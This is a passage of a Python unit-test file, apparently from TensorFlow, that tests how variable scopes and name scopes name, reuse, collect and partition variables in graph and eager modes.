# ValueError: Operation name: ".../Assign"... is not an element of this graph.
@test_util.run_in_graph_and_eager_modes
def testGetVariableScope(self):
# Test the get_variable_scope() function and setting properties of result.
init = init_ops.constant_initializer(0.3)
with variable_scope.variable_scope("bar"):
new_init1 = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init1, None)
# Check that we can set initializer like this.
variable_scope.get_variable_scope().set_initializer(init)
v = variable_scope.get_variable("v", [])
self.evaluate(variables_lib.variables_initializer([v]))
self.assertAllClose(self.evaluate(v.value()), 0.3)
if not context.executing_eagerly():
# Check that we can set reuse.
variable_scope.get_variable_scope().reuse_variables()
with self.assertRaises(ValueError): # Fail, w does not exist yet.
variable_scope.get_variable("w", [1])
# Check that the set initializer goes away.
new_init = variable_scope.get_variable_scope().initializer
self.assertEqual(new_init, None)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScope(self):
with variable_scope.variable_scope("tower4") as tower:
self.assertEqual(tower.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower4/scope/")
with variable_scope.variable_scope("tower5"):
with variable_scope.variable_scope("bar") as bar:
self.assertEqual(bar.name, "tower5/bar")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower5/bar/scope/")
with variable_scope.variable_scope("tower6"):
with variable_scope.variable_scope(tower, reuse=True) as tower_shared:
self.assertEqual(tower_shared.name, "tower4")
with ops.name_scope("scope") as sc:
self.assertEqual(sc, "tower6/tower4/scope/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNameScope(self):
with ops.name_scope("testVarScopeNameScope1"):
with variable_scope.variable_scope("tower") as tower:
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(
tower): # Re-entering acts like another "tower".
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_1/scope2/")
with variable_scope.variable_scope(
"tower"): # Re-entering by string acts the same.
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope1/tower_2/scope2/")
with ops.name_scope("testVarScopeNameScope2"):
with variable_scope.variable_scope("tower"):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower/scope2/")
if not context.executing_eagerly():
with variable_scope.variable_scope(tower):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope2/tower_1/scope2/")
root_var_scope = variable_scope.get_variable_scope()
with ops.name_scope("testVarScopeNameScope3"):
with variable_scope.variable_scope(root_var_scope):
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "testVarScopeNameScope3/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOriginalNameScope(self):
with self.cached_session():
with ops.name_scope("scope1"):
with variable_scope.variable_scope("tower") as tower:
self.assertEqual(tower.original_name_scope, "scope1/tower/")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "scope1/tower/scope2/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower) as tower1:
# Re-entering preserves original name scope.
self.assertEqual(tower1.original_name_scope, "scope1/tower/")
with ops.name_scope("foo") as sc2:
self.assertEqual(sc2, "scope2/tower/foo/")
# Test re-entering original name scope.
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar/")
with ops.name_scope("scope2"):
with variable_scope.variable_scope(tower):
with ops.name_scope(tower.original_name_scope):
with ops.name_scope("bar") as sc3:
self.assertEqual(sc3, "scope1/tower/bar_1/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeObjectReuse(self):
with self.cached_session():
vs = None
with variable_scope.variable_scope("jump", reuse=True) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertTrue(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertTrue(jump_no_reuse.reuse) # Inherited, cannot be undone.
with variable_scope.variable_scope("jump", reuse=False) as scope:
vs = scope
with variable_scope.variable_scope(vs) as jump:
self.assertFalse(jump.reuse)
with variable_scope.variable_scope(vs, reuse=True) as jump_reuse:
self.assertTrue(jump_reuse.reuse)
with variable_scope.variable_scope(vs, reuse=False) as jump_no_reuse:
self.assertFalse(jump_no_reuse.reuse)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetOrCreateReuse(self):
with self.cached_session():
def test_value(value):
x = constant_op.constant(value)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = state_ops.assign(variable_scope.get_variable("var", []), x)
with variable_scope.variable_scope(
"testVarScopeGetOrCreateReuse_bar",
reuse=variable_scope.AUTO_REUSE):
_ = variable_scope.get_variable("var", [])
self.assertEqual(value, x.eval())
test_value(42.) # Variable is created.
test_value(13.) # Variable is reused hereafter.
test_value(17.)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScope(self):
with self.cached_session():
with ops.name_scope("testVarOpScope1"):
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "tower/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower/testVarOpScope2/")
with variable_scope.variable_scope("tower", "default", []):
with self.assertRaises(ValueError):
variable_scope.get_variable("w", [])
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope1/tower_1/testVarOpScope2/")
with ops.name_scope("testVarOpScope2"):
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default/testVarOpScope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default_1/w:0")
with ops.name_scope("testVarOpScope2") as sc2:
self.assertEqual(sc2, "testVarOpScope2/default_1/testVarOpScope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesInterleavedSubstringScopes(self):
with self.cached_session():
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_1/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope/layer/w:0")
with variable_scope.variable_scope(None, "defaultScope1"):
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"defaultScope1_2/layer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeUniqueNamesWithJump(self):
with self.cached_session():
with variable_scope.variable_scope("default") as default:
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/layer/w:0")
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"default/layer_1/w:0")
with variable_scope.variable_scope(default):
pass
# No matter the jump in the middle, unique numbering continues.
with variable_scope.variable_scope(None, "layer"):
self.assertEqual(
variable_scope.get_variable("w", []).name,
"default/layer_2/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuse(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True) as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeGetVar(self):
with self.cached_session():
with variable_scope.variable_scope("root"):
with variable_scope.variable_scope("towerA") as tower_a:
va = variable_scope.get_variable("v", [1])
self.assertEqual(va.name, "root/towerA/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("towerB"):
vb = variable_scope.get_variable("v", [1])
self.assertEqual(vb.name, "root/towerB/v:0")
with self.assertRaises(ValueError):
with variable_scope.variable_scope("towerA"):
va2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("towerA", reuse=True):
va2 = variable_scope.get_variable("v", [1])
self.assertEqual(va2, va)
with variable_scope.variable_scope("foo"):
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "root/foo/bar/v:0")
with variable_scope.variable_scope(tower_a, reuse=True):
va3 = variable_scope.get_variable("v", [1])
self.assertEqual(va, va3)
with self.assertRaises(ValueError):
with variable_scope.variable_scope(tower_a, reuse=True):
with variable_scope.variable_scope("baz"):
variable_scope.get_variable("v", [1])
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [2]) # Different shape.
self.assertEqual("shape" in str(exc.exception), True)
with self.assertRaises(ValueError) as exc:
with variable_scope.variable_scope(tower_a, reuse=True):
variable_scope.get_variable("v", [1], dtype=dtypes.int32)
self.assertEqual("dtype" in str(exc.exception), True)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarScopeNestedOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope("default"):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer_1/scope2/")
with variable_scope.variable_scope("default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default_1/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeReuseParam(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope("tower", "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/tower/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer) as outer:
with variable_scope.variable_scope("tower", "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# AttributeError: 'variable_scope' object has no attribute
# '_graph_context_manager'
def testVarOpScopeReuseError(self):
with self.cached_session():
with self.assertRaises(ValueError):
with variable_scope.variable_scope(None, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testVarOpScopeNestedOuterScope(self):
with self.cached_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with variable_scope.variable_scope(
"scope", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "scope/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope(scope, auxiliary_name_scope=False):
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "scope/w1:0")
self.assertEqual(constant_op.constant([], name="c1").name, "c1:0")
      # Recheck: the name scope was NOT created above, so entering it here starts fresh.
with ops.name_scope("scope"):
self.assertEqual(constant_op.constant([], name="c").name, "scope/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
"inner", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/c:0")
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as inner1:
self.assertEqual(inner1.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
        # Recheck: the name scope was NOT created above, so entering it here starts fresh.
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
with variable_scope.variable_scope(
None, default_name="default", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
      # Recheck: the name scope was NOT created above, so entering it here starts fresh.
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "default/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
None, default_name="default",
auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/c:0")
        # Recheck: the name scope was NOT created above, so entering it here starts fresh.
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/default/c:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
with self.cached_session():
root_scope = variable_scope.get_variable_scope()
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w", []).name, "w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w1", []).name, "w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testAuxiliaryNameScopeIsInvalid(self):
with self.cached_session():
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
None, default_name="scope", auxiliary_name_scope="invalid"):
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
"scope", auxiliary_name_scope="invalid"):
pass
with variable_scope.variable_scope("scope") as scope:
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
scope, auxiliary_name_scope="invalid"):
pass
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testReuseScopeWithoutNameScopeCollision(self):
# Github issue: #13429
with self.cached_session():
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope("inner") as inner:
pass
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope:
with ops.name_scope(scope.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "inner/c:0")
with variable_scope.variable_scope("another"):
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope1:
with ops.name_scope(scope1.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w1", []).name,
"outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/inner/c1:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "another/inner/c:0")
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
# (different assertions failing after wrapping, in both execution modes)
@test_util.run_in_graph_and_eager_modes
def testGetLocalVar(self):
# Check that local variable respects naming.
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
local_var = variable_scope.get_local_variable(
"w", [], collections=["foo"])
self.assertEqual(local_var.name, "outer/w:0")
if not context.executing_eagerly():
      # Since the variable is local, it should be in the local variable collection
# but not the trainable collection.
self.assertIn(local_var,
ops.get_collection(ops.GraphKeys.LOCAL_VARIABLES))
self.assertIn(local_var, ops.get_collection("foo"))
self.assertNotIn(local_var,
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# Check that local variable respects `reuse`.
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_local_variable("w", []).name, "outer/w:0")
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testSignatureGetVarVsGetLocalVar(self):
"""get_{local,}variable() must take the same list of args."""
arg_names = tf_inspect.getargspec(variable_scope.get_variable)[0]
local_arg_names = tf_inspect.getargspec(
variable_scope.get_local_variable)[0]
self.assertEqual(arg_names, local_arg_names)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVarWithDevice(self):
g = ops.Graph()
varname_type = []
def device_func(op):
if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
varname_type.append((op.name, op.get_attr("dtype")))
return "/device:GPU:0"
with g.as_default():
with ops.device(device_func):
_ = variable_scope.get_variable("x", (100, 200))
_ = variable_scope.get_variable(
"y", dtype=dtypes.int64, initializer=numpy.arange(73))
self.assertEqual(varname_type[0], ("x", dtypes.float32))
self.assertEqual(varname_type[1], ("y", dtypes.int64))
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetCollection(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
with variable_scope.variable_scope("testGetCollection_foo_") as scope1:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo_/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0"
])
with variable_scope.variable_scope("testGetCollection_foo") as scope2:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
scope = variable_scope.get_variable_scope()
self.assertEqual([
v.name for v in scope.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_a:0", "testGetCollection_b:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0",
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
self.assertEqual([
v.name
for v in scope.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], [
"testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_a:0"
])
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetTrainableVariablesWithGetVariable(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetTrainableVariables_a", [])
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.get_variable("testGetTrainableVariables_b", [])
_ = variable_scope.get_variable(
"testGetTrainableVariables_c", [], trainable=False)
# sync `ON_READ` sets trainable=False
_ = variable_scope.get_variable(
"testGetTrainableVariables_d", [],
synchronization=variable_scope.VariableSynchronization.ON_READ)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
        # All other sync values set trainable=True
_ = variable_scope.get_variable(
"testGetTrainableVariables_e", [],
synchronization=variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual([v.name for v in scope.trainable_variables()], [
"testGetTrainableVariables_foo/testGetTrainableVariables_b:0",
"testGetTrainableVariables_foo/testGetTrainableVariables_e:0"
])
with self.assertRaisesRegexp(
ValueError, "Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ."):
_ = variable_scope.get_variable(
"testGetTrainableVariables_e", [],
synchronization=variable_scope.VariableSynchronization.ON_READ,
trainable=True)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetTrainableVariablesWithVariable(self):
with self.cached_session():
_ = variable_scope.variable(1.0, name="testGetTrainableVariables_a")
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.variable(1.0, name="testGetTrainableVariables_b")
_ = variable_scope.variable(
1.0, name="testGetTrainableVariables_c", trainable=False)
# sync `ON_READ` sets trainable=False
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_d",
synchronization=variable_scope.VariableSynchronization.ON_READ)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/testGetTrainableVariables_b:0"])
        # All other sync values set trainable=True
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_e",
synchronization=variable_scope.VariableSynchronization.ON_WRITE)
self.assertEqual([v.name for v in scope.trainable_variables()], [
"testGetTrainableVariables_foo/testGetTrainableVariables_b:0",
"testGetTrainableVariables_foo/testGetTrainableVariables_e:0"
])
with self.assertRaisesRegexp(
ValueError, "Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ."):
_ = variable_scope.variable(
1.0,
name="testGetTrainableVariables_e",
synchronization=variable_scope.VariableSynchronization.ON_READ,
trainable=True)
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetGlobalVariables(self):
with self.cached_session():
_ = variable_scope.get_variable("testGetGlobalVariables_a", [])
with variable_scope.variable_scope("testGetGlobalVariables_foo") as scope:
_ = variable_scope.get_variable("testGetGlobalVariables_b", [])
self.assertEqual(
[v.name for v in scope.global_variables()],
["testGetGlobalVariables_foo/"
"testGetGlobalVariables_b:0"])
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testGetLocalVariables(self):
with self.cached_session():
_ = variable_scope.get_variable(
"a", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
with variable_scope.variable_scope("foo") as scope:
_ = variable_scope.get_variable(
"b", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
_ = variable_scope.get_variable("c", [])
self.assertEqual([v.name for v in scope.local_variables()], ["foo/b:0"])
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testGetVariableWithRefDtype(self):
v = variable_scope.get_variable("v", shape=[3, 4], dtype=dtypes.float32)
# Ensure it is possible to do get_variable with a _ref dtype passed in.
_ = variable_scope.get_variable("w", shape=[5, 6], dtype=v.dtype)
@test_util.run_in_graph_and_eager_modes
@run_inside_wrap_function_in_eager_mode
def testTwoGraphs(self):
def f():
g1 = ops.Graph()
g2 = ops.Graph()
with g1.as_default():
with g2.as_default():
with variable_scope.variable_scope("_"):
pass
self.assertRaisesRegexp(ValueError, "'_' is not a valid scope name", f)
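# Partitioner helpers for the tests below: each returns a per-dimension
# partition count, splitting only axis 0 into 1, 2, or 3 pieces respectively.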
def axis0_into1_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
return part
def axis0_into2_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 2
return part
def axis0_into3_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 3
return part
class VariableScopeWithPartitioningTest(test.TestCase):
# TODO(mihaimaruseac): Not converted to use wrap_function because of
# obtaining different results in the eager case compared to the graph one
def testResultNameMatchesRequested(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v.name, "scope0/name0")
v_concat = v.as_tensor()
self.assertEqual(v_concat.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0/part_0:0", [x.name for x in variables])
self.assertIn("scope0/name0/part_1:0", [x.name for x in variables])
self.assertNotIn("scope0/name0/part_2:0", [x.name for x in variables])
@test_util.run_in_graph_and_eager_modes
